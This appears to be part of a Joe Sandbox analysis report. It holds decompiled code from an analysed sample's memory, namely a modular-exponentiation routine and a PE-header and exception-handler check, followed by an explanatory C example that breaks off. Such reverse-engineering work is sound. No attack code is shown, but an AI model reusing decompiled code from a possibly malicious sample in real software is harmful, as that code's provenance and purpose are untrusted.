                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				signed int _v60;
                                                                                  				signed int _v64;
                                                                                  				intOrPtr _v580;
                                                                                  				unsigned int _v584;
                                                                                  				signed int _v588;
                                                                                  				intOrPtr _v592;
                                                                                  				intOrPtr _t249;
                                                                                  				signed int _t260;
                                                                                  				signed int _t282;
                                                                                  				signed int _t302;
                                                                                  				signed int _t311;
                                                                                  				signed int _t317;
                                                                                  				signed int _t329;
                                                                                  				signed int _t334;
                                                                                  				signed int _t370;
                                                                                  				unsigned int _t377;
                                                                                  				signed int _t389;
                                                                                  				signed int _t416;
                                                                                  				signed int _t425;
                                                                                  				signed int _t433;
                                                                                  				unsigned int _t441;
                                                                                  				signed int _t443;
                                                                                  				signed int _t445;
                                                                                  				signed int _t446;
                                                                                  				signed int _t448;
                                                                                  				signed int _t449;
                                                                                  				void* _t463;
                                                                                  				void* _t464;
                                                                                  				void* _t465;
                                                                                  				void* _t470;
                                                                                  				void* _t471;
                                                                                  				void* _t472;
                                                                                  				void* _t477;
                                                                                  
                                                                                  				_t341 = _a12;
                                                                                  				_t249 = E00402290(_a12, _a20);
                                                                                  				_t465 = _t464 + 8;
                                                                                  				_v592 = _t249;
                                                                                  				if(_v592 != 0) {
                                                                                  					__eflags = _v592 - 1;
                                                                                  					if(_v592 != 1) {
                                                                                   						_v28 = 0;   // window width: number of table entries <= the bit length
                                                                                  						while(1) {
                                                                                  							__eflags = _v28 - 8;
                                                                                  							if(_v28 >= 8) {
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _v28 - 0x20;
                                                                                  							if(_v28 >= 0x20) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t341 = _v28;
                                                                                  							__eflags =  *((intOrPtr*)(0x4143a4 + _t341 * 4)) - _v592;
                                                                                  							if( *((intOrPtr*)(0x4143a4 + _t341 * 4)) <= _v592) {
                                                                                  								_t334 = _v28 + 1;
                                                                                  								__eflags = _t334;
                                                                                  								_v28 = _t334;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v28 - 1;
                                                                                  						if(__eflags > 0) {
                                                                                  							_v44 = _a20 << 1;
                                                                                  							_v48 = E00401400(_t341, _v44);
                                                                                  							_v52 = E00401400(_v44, _v44);
                                                                                  							_v20 = E00401400(_v44, _v44);
                                                                                  							_v16 = E00401400(_v44, _v44);
                                                                                  							_v580 = _a8;
                                                                                  							E00402950(_v580, __eflags, _v20, _v580, _v580, _a16, _a20);
                                                                                  							_t470 = _t465 + 0x24;
                                                                                   							_v64 = 1 << _v28 - 1;   // count of precomputed odd powers base^(2i+1)
                                                                                  							_v24 = 1;
                                                                                  							while(1) {
                                                                                  								_t347 = _v24;
                                                                                  								__eflags = _v24 - _v64;
                                                                                  								if(_v24 >= _v64) {
                                                                                  									break;
                                                                                  								}
                                                                                  								 *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)) = E00401400(_t347, _v44);
                                                                                  								E00402310( *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)), _a20);
                                                                                  								_t477 = _t470 + 0x10;
                                                                                  								do {
                                                                                  									E00401960(_v48, _v20,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _a20);
                                                                                  									E00401BD0(__eflags, _v52,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t477 = _t477 + 0x28;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								_t329 = _v24 + 1;
                                                                                  								__eflags = _t329;
                                                                                  								_v24 = _t329;
                                                                                  							}
                                                                                   							_v56 = 1;   // result (_v16) still equals 1: the first multiply is a copy
                                                                                  							_t260 = E00402250(_a12, _a20);
                                                                                  							_t471 = _t470 + 8;
                                                                                  							_v588 = _t260;
                                                                                   							_v40 = 0x80000000;   // bit mask; the loop below skips leading zero bits of the top word
                                                                                  							while(1) {
                                                                                  								__eflags = _v40;
                                                                                  								if(_v40 <= 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t449 = _v588;
                                                                                  								_t317 = _a12;
                                                                                  								__eflags =  *(_t317 + _t449 * 4 - 4) & _v40;
                                                                                  								if(( *(_t317 + _t449 * 4 - 4) & _v40) == 0) {
                                                                                  									_t389 = _v40 >> 1;
                                                                                  									__eflags = _t389;
                                                                                  									_v40 = _t389;
                                                                                  									continue;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                   							_v12 = 0;   // bits of the current window still to be consumed
                                                                                   							_v8 = 0;    // nonzero while inside a window
                                                                                   							_v36 = 0;   // index of the window's value in the precomputed table
                                                                                  							while(1) {
                                                                                  								__eflags = _v588;
                                                                                  								if(_v588 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eflags = _v56;
                                                                                  								if(_v56 != 0) {
                                                                                  									L29:
                                                                                  									__eflags = _v8;
                                                                                  									if(_v8 != 0) {
                                                                                  										__eflags = _v12;
                                                                                  										if(_v12 > 0) {
                                                                                  											_t433 = _v12 - 1;
                                                                                  											__eflags = _t433;
                                                                                  											_v12 = _t433;
                                                                                  										}
                                                                                  										L52:
                                                                                  										__eflags = _v8;
                                                                                  										if(_v8 == 0) {
                                                                                  											do {
                                                                                  												L58:
                                                                                  												__eflags = _v40 - 1;
                                                                                  												if(_v40 != 1) {
                                                                                  													_t425 = _v40 >> 1;
                                                                                  													__eflags = _t425;
                                                                                  													_v40 = _t425;
                                                                                  												} else {
                                                                                  													_v40 = 0x80000000;
                                                                                  													_v588 = _v588 - 1;
                                                                                  												}
                                                                                  												__eflags = 0;
                                                                                  											} while (0 != 0);
                                                                                  											continue;
                                                                                  										}
                                                                                  										__eflags = _v12 - 1;
                                                                                  										if(_v12 >= 1) {
                                                                                  											goto L58;
                                                                                  										}
                                                                                  										__eflags = _v56;
                                                                                   										if(_v56 == 0) {   // result = result * table[_v36] mod _a16
                                                                                  											do {
                                                                                  												E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                  												E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  												_t471 = _t471 + 0x28;
                                                                                  												__eflags = 0;
                                                                                  											} while (0 != 0);
                                                                                  											L57:
                                                                                  											_v8 = 0;
                                                                                  											_v12 = 0;
                                                                                  											goto L58;
                                                                                  										}
                                                                                   										// first window: result = table[_v36] (copy instead of multiply by 1)
                                                                                   										E00402310(_v36, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                  										_t471 = _t471 + 0xc;
                                                                                  										_v56 = 0;
                                                                                  										goto L57;
                                                                                  									}
                                                                                  									_t302 = _v588;
                                                                                  									_t370 = _a12;
                                                                                  									__eflags =  *(_t370 + _t302 * 4 - 4) & _v40;
                                                                                  									if(( *(_t370 + _t302 * 4 - 4) & _v40) == 0) {
                                                                                  										L49:
                                                                                  										goto L52;
                                                                                  									}
                                                                                   									_v8 = 1;            // a 1 bit opens a window
                                                                                   									_v60 = _v40;        // look-ahead copies of the mask and word index
                                                                                   									_v32 = _v588;
                                                                                   									_v584 = 1;          // the window's value, extended bit by bit below
                                                                                  									_v24 = 0;
                                                                                  									while(1) {
                                                                                  										__eflags = _v24 - _v28 - 1;
                                                                                  										if(_v24 >= _v28 - 1) {
                                                                                  											break;
                                                                                  										} else {
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										do {
                                                                                  											L34:
                                                                                  											__eflags = _v60 - 1;
                                                                                  											if(_v60 != 1) {
                                                                                  												_t443 = _v60 >> 1;
                                                                                  												__eflags = _t443;
                                                                                  												_v60 = _t443;
                                                                                  											} else {
                                                                                  												_v60 = 0x80000000;
                                                                                  												_v32 = _v32 - 1;
                                                                                  											}
                                                                                  											__eflags = 0;
                                                                                  										} while (0 != 0);
                                                                                  										_v584 = _v584 << 1;
                                                                                  										__eflags = _v32;
                                                                                  										if(_v32 != 0) {
                                                                                  											_t446 = _v32;
                                                                                  											_t311 = _a12;
                                                                                  											__eflags =  *(_t311 + _t446 * 4 - 4) & _v60;
                                                                                  											if(( *(_t311 + _t446 * 4 - 4) & _v60) != 0) {
                                                                                  												_t448 = _v584 | 0x00000001;
                                                                                  												__eflags = _t448;
                                                                                  												_v584 = _t448;
                                                                                  											}
                                                                                  										}
                                                                                  										_t445 = _v24 + 1;
                                                                                  										__eflags = _t445;
                                                                                  										_v24 = _t445;
                                                                                  									}
                                                                                  									_v12 = _v28 - 1;
                                                                                  									while(1) {
                                                                                  										__eflags = _v12;
                                                                                  										if(_v12 <= 0) {
                                                                                  											break;
                                                                                  										}
                                                                                  										__eflags = _v584 & 0x00000001;
                                                                                  										if((_v584 & 0x00000001) == 0) {
                                                                                  											_v12 = _v12 - 1;
                                                                                  											_t441 = _v584 >> 1;
                                                                                  											__eflags = _t441;
                                                                                  											_v584 = _t441;
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									_t377 = _v584 >> 1;
                                                                                  									__eflags = _t377;
                                                                                  									_v36 = _t377;
                                                                                  									goto L49;
                                                                                  								} else {
                                                                                  									goto L28;
                                                                                  								}
                                                                                  								do {
                                                                                  									L28:
                                                                                  									E00401F80(_v48, _v16, _a20);
                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t471 = _t471 + 0x24;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							__eflags = _v8;
                                                                                  							if(_v8 == 0) {
                                                                                  								L67:
                                                                                  								E00402310(_a4, _a4, _v16, _a20);
                                                                                  								_t472 = _t471 + 0xc;
                                                                                  								do {
                                                                                  									__eflags = _v16;
                                                                                  									if(_v16 != 0) {
                                                                                  										E00402350(_v16, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v16);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v20;
                                                                                  									if(_v20 != 0) {
                                                                                  										E00402350(_v20, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v20);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v48;
                                                                                  									if(_v48 != 0) {
                                                                                  										E00402350(_v48, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v48);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v52;
                                                                                  									if(_v52 != 0) {
                                                                                  										E00402350(_v52, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v52);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								_v24 = 1;
                                                                                  								while(1) {
                                                                                  									__eflags = _v24 - _v64;
                                                                                  									if(_v24 >= _v64) {
                                                                                  										break;
                                                                                  									} else {
                                                                                  										goto L83;
                                                                                  									}
                                                                                  									do {
                                                                                  										L83:
                                                                                  										_t416 = _v24;
                                                                                  										__eflags =  *(_t463 + _t416 * 4 - 0x240);
                                                                                  										if( *(_t463 + _t416 * 4 - 0x240) != 0) {
                                                                                  											E00402350( *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v44);
                                                                                  											_t472 = _t472 + 8;
                                                                                  										}
                                                                                  										E00401430(_t463 + _v24 * 4 - 0x240);
                                                                                  										_t472 = _t472 + 4;
                                                                                  										__eflags = 0;
                                                                                  									} while (0 != 0);
                                                                                  									_t282 = _v24 + 1;
                                                                                  									__eflags = _t282;
                                                                                  									_v24 = _t282;
                                                                                  								}
                                                                                  								__eflags = 0;
                                                                                  								return 0;
                                                                                  							}
                                                                                  							__eflags = _v56;
                                                                                  							if(_v56 == 0) {
                                                                                  								do {
                                                                                  									E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t471 = _t471 + 0x28;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								goto L67;
                                                                                  							}
                                                                                  							E00402310(_v16, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                  							_t471 = _t471 + 0xc;
                                                                                  							_v56 = 0;
                                                                                  							goto L67;
                                                                                  						}
                                                                                  						return E00402A00(__eflags, _a4, _a8, _a12, _a16, _a20);
                                                                                  					}
                                                                                  					E00402880(_a4, _a8, _a20, _a16, _a20);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				E00402390(_t341, _a4, 1, _a20);
                                                                                  				return 1;
                                                                                  			}
                                                                                  0x00403213
                                                                                  0x00403216
                                                                                  0x004031f6
                                                                                  0x004031ff
                                                                                  0x004031ff
                                                                                  0x00403201
                                                                                  0x00000000
                                                                                  0x00403201
                                                                                  0x00000000
                                                                                  0x00403218
                                                                                  0x00403222
                                                                                  0x00403222
                                                                                  0x00403224
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004030f6
                                                                                  0x004030f6
                                                                                  0x00403102
                                                                                  0x00403124
                                                                                  0x00403129
                                                                                  0x0040312c
                                                                                  0x0040312c
                                                                                  0x00000000
                                                                                  0x004030f6
                                                                                  0x004032f4
                                                                                  0x004032f8
                                                                                  0x00403369
                                                                                  0x00403375
                                                                                  0x0040337a
                                                                                  0x0040337d
                                                                                  0x0040337d
                                                                                  0x00403381
                                                                                  0x0040338b
                                                                                  0x00403390
                                                                                  0x00403390
                                                                                  0x00403397
                                                                                  0x0040339c
                                                                                  0x0040339f
                                                                                  0x0040339f
                                                                                  0x004033a3
                                                                                  0x004033a3
                                                                                  0x004033a7
                                                                                  0x004033b1
                                                                                  0x004033b6
                                                                                  0x004033b6
                                                                                  0x004033bd
                                                                                  0x004033c2
                                                                                  0x004033c5
                                                                                  0x004033c5
                                                                                  0x004033c9
                                                                                  0x004033c9
                                                                                  0x004033cd
                                                                                  0x004033d7
                                                                                  0x004033dc
                                                                                  0x004033dc
                                                                                  0x004033e3
                                                                                  0x004033e8
                                                                                  0x004033eb
                                                                                  0x004033eb
                                                                                  0x004033ef
                                                                                  0x004033ef
                                                                                  0x004033f3
                                                                                  0x004033fd
                                                                                  0x00403402
                                                                                  0x00403402
                                                                                  0x00403409
                                                                                  0x0040340e
                                                                                  0x00403411
                                                                                  0x00403411
                                                                                  0x00403415
                                                                                  0x00403427
                                                                                  0x0040342a
                                                                                  0x0040342d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040342f
                                                                                  0x0040342f
                                                                                  0x0040342f
                                                                                  0x00403432
                                                                                  0x0040343a
                                                                                  0x0040344b
                                                                                  0x00403450
                                                                                  0x00403450
                                                                                  0x0040345e
                                                                                  0x00403463
                                                                                  0x00403466
                                                                                  0x00403466
                                                                                  0x00403421
                                                                                  0x00403421
                                                                                  0x00403424
                                                                                  0x00403424
                                                                                  0x0040346c
                                                                                  0x00000000
                                                                                  0x0040346c
                                                                                  0x004032fa
                                                                                  0x004032fe
                                                                                  0x00403324
                                                                                  0x0040333b
                                                                                  0x0040335d
                                                                                  0x00403362
                                                                                  0x00403365
                                                                                  0x00403365
                                                                                  0x00000000
                                                                                  0x00403324
                                                                                  0x00403313
                                                                                  0x00403318
                                                                                  0x0040331b
                                                                                  0x00000000
                                                                                  0x0040331b
                                                                                  0x00000000
                                                                                  0x00402f56
                                                                                  0x00402ef1
                                                                                  0x00000000
                                                                                  0x00402ef9
                                                                                  0x00402ec2
                                                                                  0x00000000

Strings
Memory Dump Source
• Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 126ff2460c73df62577a113f922c69a32de2f099fd1620a44d5835c220e5ee3b
• Instruction ID: 666c09e752f25340368080dc05edb327bf1878cdf7e1111d2f812ccb911ea8c0
• Opcode Fuzzy Hash: 126ff2460c73df62577a113f922c69a32de2f099fd1620a44d5835c220e5ee3b
• Instruction Fuzzy Hash: 59124EB1D001099BCF14DF98D985AEFB7B9BB88305F14816DF909B7380D739AA41CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040F2CD(long _a4) {
	intOrPtr _v8;
	intOrPtr _v12;
	signed int _v16;
	short* _v32;
	void _v36;
	void* _t57;
	signed int _t58;
	signed int _t61;
	signed int _t62;
	void* _t63;
	signed int* _t68;
	intOrPtr* _t69;
	intOrPtr* _t71;
	intOrPtr _t72;
	intOrPtr _t75;
	void* _t76;
	signed int _t77;
	void* _t78;
	void _t80;
	signed int _t81;
	signed int _t84;
	signed int _t86;
	short* _t87;
	void* _t89;
	signed int* _t90;
	long _t91;
	signed int _t93;
	signed int _t94;
	signed int _t100;
	signed int _t102;
	void* _t104;
	long _t108;
	signed int _t110;

	_t108 = _a4;
	_t76 =  *(_t108 + 8);
	if((_t76 & 0x00000003) != 0) {
		L3:
		return 0;
	}
	_a4 =  *[fs:0x4];
	_v8 =  *[fs:0x8];
	if(_t76 < _v8 || _t76 >= _a4) {
		_t102 =  *(_t108 + 0xc);
		__eflags = _t102 - 0xffffffff;
		if(_t102 != 0xffffffff) {
			_t91 = 0;
			__eflags = 0;
			_a4 = 0;
			_t57 = _t76;
			do {
				_t80 =  *_t57;
				__eflags = _t80 - 0xffffffff;
				if(_t80 == 0xffffffff) {
					goto L9;
				}
				__eflags = _t80 - _t91;
				if(_t80 >= _t91) {
					L20:
					_t63 = 0;
					L60:
					return _t63;
				}
				L9:
				__eflags =  *(_t57 + 4);
				if( *(_t57 + 4) != 0) {
					_t12 =  &_a4;
					 *_t12 = _a4 + 1;
					__eflags =  *_t12;
				}
				_t91 = _t91 + 1;
				_t57 = _t57 + 0xc;
				__eflags = _t91 - _t102;
			} while (_t91 <= _t102);
			__eflags = _a4;
			if(_a4 == 0) {
				L15:
				_t81 =  *0x415690;
				_t110 = _t76 & 0xfffff000;
				_t58 = 0;
				__eflags = _t81;
				if(_t81 <= 0) {
					L18:
					_t104 = _t102 | 0xffffffff;
					_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
					__eflags = _t61;
					if(_t61 < 0) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = _a4;
					}
					__eflags = _t62;
					if(_t62 == 0) {
						L59:
						_t63 = _t104;
						goto L60;
					} else {
						__eflags = _v12 - 0x1000000;
						if(_v12 != 0x1000000) {
							goto L59;
						}
						__eflags = _v16 & 0x000000cc;
						if((_v16 & 0x000000cc) == 0) {
							L46:
							_t63 = 1;
							 *0x4156d8 = 1;
							__eflags =  *0x4156d8;
							if( *0x4156d8 != 0) {
								goto L60;
							}
							_t84 =  *0x415690;
							__eflags = _t84;
							_t93 = _t84;
							if(_t84 <= 0) {
								L51:
								__eflags = _t93;
								if(_t93 != 0) {
									L58:
									 *0x4156d8 = 0;
									goto L5;
								}
								_t77 = 0xf;
								__eflags = _t84 - _t77;
								if(_t84 <= _t77) {
									_t77 = _t84;
								}
								_t94 = 0;
								__eflags = _t77;
								if(_t77 < 0) {
									L56:
									__eflags = _t84 - 0x10;
									if(_t84 < 0x10) {
										_t86 = _t84 + 1;
										__eflags = _t86;
										 *0x415690 = _t86;
									}
									goto L58;
								} else {
									do {
										_t68 = 0x415698 + _t94 * 4;
										_t94 = _t94 + 1;
										__eflags = _t94 - _t77;
										 *_t68 = _t110;
										_t110 =  *_t68;
									} while (_t94 <= _t77);
									goto L56;
								}
							}
							_t69 = 0x415694 + _t84 * 4;
							while(1) {
								__eflags =  *_t69 - _t110;
								if( *_t69 == _t110) {
									goto L51;
								}
								_t93 = _t93 - 1;
								_t69 = _t69 - 4;
								__eflags = _t93;
								if(_t93 > 0) {
									continue;
								}
								goto L51;
							}
							goto L51;
						}
						_t87 = _v32;
						__eflags =  *_t87 - 0x5a4d;
						if( *_t87 != 0x5a4d) {
							goto L59;
						}
						_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                  									if( *_t71 != 0x4550) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t78 = _t76 - _t87;
                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                  									__eflags = _t78 - _t72;
                                                                                  									if(_t78 < _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                  										goto L20;
                                                                                  									}
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							} else {
                                                                                  								goto L16;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L16:
                                                                                  								__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 + 1;
                                                                                  								__eflags = _t58 - _t81;
                                                                                  								if(_t58 < _t81) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L18;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 <= 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							 *0x4156d8 = 1;
                                                                                  							__eflags =  *0x4156d8;
                                                                                  							if( *0x4156d8 != 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  							if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  								L32:
                                                                                  								_t100 = 0;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 < 0) {
                                                                                  									L34:
                                                                                  									 *0x4156d8 = 0;
                                                                                  									goto L5;
                                                                                  								} else {
                                                                                  									goto L33;
                                                                                  								}
                                                                                  								do {
                                                                                  									L33:
                                                                                  									_t90 = 0x415698 + _t100 * 4;
                                                                                  									_t100 = _t100 + 1;
                                                                                  									__eflags = _t100 - _t58;
                                                                                  									 *_t90 = _t110;
                                                                                  									_t110 =  *_t90;
                                                                                  								} while (_t100 <= _t58);
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							_t58 = _t81 - 1;
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 < 0) {
                                                                                  								L28:
                                                                                  								__eflags = _t81 - 0x10;
                                                                                  								if(_t81 < 0x10) {
                                                                                  									_t81 = _t81 + 1;
                                                                                  									__eflags = _t81;
                                                                                  									 *0x415690 = _t81;
                                                                                  								}
                                                                                  								_t58 = _t81 - 1;
                                                                                  								goto L32;
                                                                                  							} else {
                                                                                  								goto L25;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L25:
                                                                                  								__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 - 1;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 >= 0) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(__eflags >= 0) {
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L32;
                                                                                  							}
                                                                                  							goto L28;
                                                                                  						}
                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                  						__eflags = _t75 - _v8;
                                                                                  						if(_t75 < _v8) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _t75 - _t108;
                                                                                  						if(_t75 >= _t108) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						goto L15;
                                                                                  					}
                                                                                  					L5:
                                                                                  					_t63 = 1;
                                                                                  					goto L60;
                                                                                  				} else {
                                                                                  					goto L3;
                                                                                  				}
                                                                                  			}
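The branch that compares `*_t87` with 0x5a4d, `*_t71` with 0x4550 and the 16-bit value at `_t71 + 0x18` with 0x10b, then indexes `_t71 + 0x18 + SizeOfOptionalHeader` and tests bit 0x80 of the byte at +0x27, is a PE32 header walk: MZ and PE signatures, the optional-header magic, the first IMAGE_SECTION_HEADER (VirtualSize at +8, VirtualAddress at +0xc) and bit 31 of Characteristics, which is IMAGE_SCN_MEM_WRITE. The outcome is whether an address, expressed as an RVA (`_t76 - _t87`), lies in a writable section. The following is an added example written for this page, not code from the sample or from the report; it assumes the standard PE32 layout for those offsets, walks all sections rather than only the first, and adds the buffer-length checks that a parser of untrusted bytes needs but in-process code reading its own mapped image does not perform. The test image is constructed inline (headers only) and is not the sample's bytes.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* PE32 offsets, the same ones the decompiled code dereferences. */
#define DOS_E_LFANEW          0x3c   /* -> NT headers; *(base) must be 'MZ' 0x5a4d      */
#define NT_NUMBER_OF_SECTIONS 0x06   /* int16; *(nt) must be 'PE\0\0' 0x4550              */
#define NT_SIZE_OF_OPT_HEADER 0x14   /* uint16                                            */
#define NT_OPT_MAGIC          0x18   /* 0x10b = PE32; first section = nt+0x18+opt size    */
#define SEC_VIRTUAL_SIZE      0x08
#define SEC_VIRTUAL_ADDRESS   0x0c
#define SEC_CHARACTERISTICS   0x24   /* byte +0x27 & 0x80 is bit 31 = IMAGE_SCN_MEM_WRITE */
#define SEC_HEADER_SIZE       0x28
#define IMAGE_SCN_MEM_WRITE   0x80000000u
/* Little-endian accessors: PE is little-endian whatever the host is. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* The three header checks from the decompiled code (MZ, PE, PE32 magic) plus the
 * length checks a parser of untrusted bytes needs and the in-process code skipped. */
int pe_validate_image_base(const uint8_t *base, size_t len)
{
    if (len < DOS_E_LFANEW + 4 || rd16(base) != 0x5a4d) return 0;
    uint32_t e_lfanew = rd32(base + DOS_E_LFANEW);
    if (e_lfanew > len - (NT_OPT_MAGIC + 2)) return 0;
    const uint8_t *nt = base + e_lfanew;
    return rd32(nt) == 0x4550 && rd16(nt + NT_OPT_MAGIC) == 0x10b;
}

/* Index of the section whose [VirtualAddress, VirtualAddress+VirtualSize) holds rva,
 * else -1. The decompiled code only tests the first header; this walks all of them. */
int pe_find_section(const uint8_t *base, size_t len, uint32_t rva, uint32_t *characteristics)
{
    if (!pe_validate_image_base(base, len)) return -1;
    const uint8_t *nt = base + rd32(base + DOS_E_LFANEW);
    int16_t nsec = (int16_t)rd16(nt + NT_NUMBER_OF_SECTIONS);
    if (nsec <= 0) return -1;                               /* same "<= 0" test as the sample */
    const uint8_t *sec = nt + NT_OPT_MAGIC + rd16(nt + NT_SIZE_OF_OPT_HEADER);
    for (int i = 0; i < nsec; i++, sec += SEC_HEADER_SIZE) {
        if ((size_t)(sec - base) + SEC_HEADER_SIZE > len) return -1;
        uint32_t va = rd32(sec + SEC_VIRTUAL_ADDRESS), vsize = rd32(sec + SEC_VIRTUAL_SIZE);
        if (rva >= va && rva - va < vsize) {                /* va <= rva < va+vsize, overflow-safe */
            if (characteristics) *characteristics = rd32(sec + SEC_CHARACTERISTICS);
            return i;
        }
    }
    return -1;
}

/* 1 = target lies in a section without IMAGE_SCN_MEM_WRITE, 0 = writable section,
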